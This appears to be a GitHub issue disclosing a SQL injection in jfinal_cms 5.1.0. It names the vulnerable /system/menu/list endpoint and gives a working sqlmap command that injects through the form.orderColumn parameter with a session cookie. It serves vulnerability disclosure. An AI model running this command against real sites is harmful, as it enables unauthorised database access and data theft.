jfinal_ CMS 5.1.0  has a SQL injection 

first  you can use the URL  

http://your IP/jfinal_cms/system/menu/list

then you can  use the shell
'''
sqlmap -u http://your IP/jfinal_cms/system/menu/list  --thread 8 --batch --smart  --random-agent --data "form.orderColumn=*&form.orderAsc=&attr.name=&totalRecords=31&pageNo=1&pageSize=20&length=10"  --cookie "your cookie"
'''


![eb8cded373ed08d22322d56fcf3ff17](https://user-images.githubusercontent.com/108649390/181822727-c6b77295-2db7-4e0a-8b68-ed67c6a964d1.png)

![2d66830146152ff675e5bfcd986e901](https://user-images.githubusercontent.com/108649390/181822811-c43af946-2234-473a-a254-a07082f33adb.png)



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

jfinal_ CMS 5.1.0 has a SQL injection #50

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

jfinal_ CMS 5.1.0 has a SQL injection #50

Description

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions